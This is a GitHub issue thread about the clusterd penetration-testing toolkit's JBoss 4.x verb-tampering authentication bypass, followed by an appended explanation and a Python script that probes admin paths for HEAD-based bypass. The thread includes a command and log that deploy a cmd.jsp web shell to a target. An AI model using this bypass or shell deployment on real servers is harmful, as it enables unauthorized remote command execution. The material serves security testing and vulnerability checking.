
head tampering #33

Open
cnilsecure opened this issue Jan 25, 2015 · 4 comments

Comments

@cnilsecure

I saw you mention an option called --verb-tamper in order to bypass JBoss 4.x auth,
but in the help itself there is no mention of how to use this option.
Can you please give more details on how to use it?

@breenmachine
Collaborator

It's an auxiliary module and doesn't show up in the main list of options; however, if you use the flag --aux-list you will see it.

It should be as simple as appending --verb-tamper to the options supplied.

hatRiot added a commit that referenced this issue Jan 25, 2015
* src/core/auxengine.py
  -- Auxiliary modules can now enable parameter passing via the
  enable_args flag.  Flag arguments will then be passed into
  the module via the fingerengine.options argument.
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Few more fixes to this and an enabling of enable_args so
  that we don't confuse the deployer.  Not sure why this was
  so broken...
@hatRiot
Owner

hatRiot commented Jan 25, 2015

Hey @cnilsecure

This issue prompted me to look into the module, and I discovered a few bugs. These have been patched up and added to the dev branch, so please check that out.

I've also added an example in the JBoss wiki for clarification. An example of the module is as follows:

```
$ ./clusterd.py -i localhost -a jboss -v4.0 --verb-tamper ./src/lib/resources/cmd.jsp

        clusterd/0.4 - clustered attack toolkit
            [Supporting 7 platforms]

[2015-01-25 12:24PM] Started at 2015-01-25 12:24PM
[2015-01-25 12:24PM] Servers' OS hinted at windows
[2015-01-25 12:24PM] Fingerprinting host '192.168.1.138'
[2015-01-25 12:24PM] Server hinted at 'jboss'
[2015-01-25 12:24PM] Checking jboss version 4.0 JBoss JMX Console...
[2015-01-25 12:24PM] Checking jboss version 4.0 JBoss Web Console...
[2015-01-25 12:24PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2015-01-25 12:24PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2015-01-25 12:24PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2015-01-25 12:24PM] Checking jboss version Any JBoss RMI Interface...
[2015-01-25 12:24PM] Checking jboss version Any JBoss Status Page...
[2015-01-25 12:24PM] Matched 7 fingerprints for service jboss
[2015-01-25 12:24PM]    JBoss JMX Console (version 4.0)
[2015-01-25 12:24PM]    JBoss Web Console (version 4.0)
[2015-01-25 12:24PM]    JBoss EJB Invoker Servlet (version Any)
[2015-01-25 12:24PM]    JBoss HTTP Headers (Unreliable) (version 4.0)
[2015-01-25 12:24PM]    JBoss JMX Invoker Servlet (version Any)
[2015-01-25 12:24PM]    JBoss RMI Interface (version Any)
[2015-01-25 12:24PM]    JBoss Status Page (version Any)
[2015-01-25 12:24PM] Fingerprinting completed.
[2015-01-25 12:24PM] Vulnerable to verb tampering, attempting to deploy...
[2015-01-25 12:24PM] Successfully deployed /home/bryan/tools/clusterd/src/lib/resources/cmd.jsp
[2015-01-25 12:24PM] Finished at 2015-01-25 12:24PM
```

Let me know if you have any other questions, and thanks for the report!

@cnilsecure
Author

Sorry to bother you again,
but it looks to me like you designed the verb tampering just for jmx-console.
I would suggest applying it to any of the JBoss "deployers", since they are all exposed to the same HEAD bug (in a lot of cases /jmx-console is missing or removed, unlike invoker, for example, or web-console).
Just my 2 cents anyhow.

@hatRiot
Owner

hatRiot commented Jan 26, 2015

Good point; I'll have to think about its implementation, but I agree it should support all interfaces.
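The check the thread is about, written out as an added example for this page (it is not clusterd's code and not the verb_tamper module): a `web.xml` `security-constraint` that names explicit `http-method` entries (typically GET and POST) only guards those verbs, while the container still dispatches a HEAD to the same servlet (`HttpServlet.doHead()` falls through to `doGet()`), so the operation runs without credentials. The script probes each administrative path with GET and, where GET is denied, retries with verbs such a constraint leaves uncovered, covering the suggestion above to test every deployer rather than only `/jmx-console`. The path list, the port 8080 default and the `fake_jboss_probe` responses are assumptions constructed for the example; `http_probe` is the only part that talks to a real host.

```python
"""
HTTP verb tampering check for JBoss 4.x administrative interfaces.

A probe is any callable probe(method, path) -> int (HTTP status code),
so the same logic runs against a live host (http_probe) or against the
constructed stand-in below (fake_jboss_probe) for offline testing.
"""
import http.client
from typing import Callable, Dict, List, Sequence

# Assumed list of "deployer" paths worth checking; extend as needed.
DEPLOYER_PATHS = (
    "/jmx-console/",
    "/web-console/",
    "/invoker/JMXInvokerServlet",
    "/invoker/EJBInvokerServlet",
)
# Verbs a GET/POST-only <http-method> list does not cover. HEAD is the
# interesting one, because it executes doGet() logic.
PROBE_VERBS = ("HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")
DENIED = (401, 403)
# Codes that do NOT show the constraint was skipped (still denied, absent,
# verb unsupported by the servlet, or unsupported by the server).
NOT_BYPASS = (401, 403, 404, 405, 501)

Probe = Callable[[str, str], int]


def check_path(probe: Probe, path: str) -> Dict[str, object]:
    """Report whether an auth-protected path answers other verbs without auth."""
    baseline = probe("GET", path)
    if baseline == 404:
        return {"path": path, "present": False, "protected": False, "bypass_verbs": []}
    if baseline not in DENIED:
        # Reachable without credentials at all: not a verb-tampering case.
        return {"path": path, "present": True, "protected": False, "bypass_verbs": []}
    bypass: List[str] = [v for v in PROBE_VERBS if probe(v, path) not in NOT_BYPASS]
    return {"path": path, "present": True, "protected": True, "bypass_verbs": bypass}


def check_all(probe: Probe, paths: Sequence[str] = DEPLOYER_PATHS) -> List[Dict[str, object]]:
    return [check_path(probe, p) for p in paths]


def http_probe(host: str, port: int = 8080, timeout: float = 5.0) -> Probe:
    """Build a probe against a live host (port 8080 is an assumption)."""
    def probe(method: str, path: str) -> int:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(method, path)
            return conn.getresponse().status
        finally:
            conn.close()
    return probe


# Constructed stand-in for a JBoss 4.x host (not a real server): the
# constraint names only GET and POST for the two consoles, /invoker/* is
# deployed without any constraint, and EJBInvokerServlet was removed.
FAKE_WEB_XML = {
    "/jmx-console/": {"GET", "POST"},
    "/web-console/": {"GET", "POST"},
    "/invoker/JMXInvokerServlet": set(),
}


def fake_jboss_probe(method: str, path: str) -> int:
    if path not in FAKE_WEB_XML:
        return 404
    if method in FAKE_WEB_XML[path]:
        return 401  # constraint applies and no credentials were sent
    if method in ("PUT", "DELETE"):
        return 405  # servlet implements neither doPut() nor doDelete()
    return 200      # HEAD/OPTIONS/TRACE dispatched to the servlet unchecked


if __name__ == "__main__":
    for r in check_all(fake_jboss_probe):
        print(r)
```

Against a real target, replace `fake_jboss_probe` with `http_probe("192.168.1.138")`; a path whose `bypass_verbs` contains `"HEAD"` is the condition under which the module's "Vulnerable to verb tampering" message applies. A 405 for PUT or DELETE is expected and is not a finding, which is why those codes sit in `NOT_BYPASS`.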
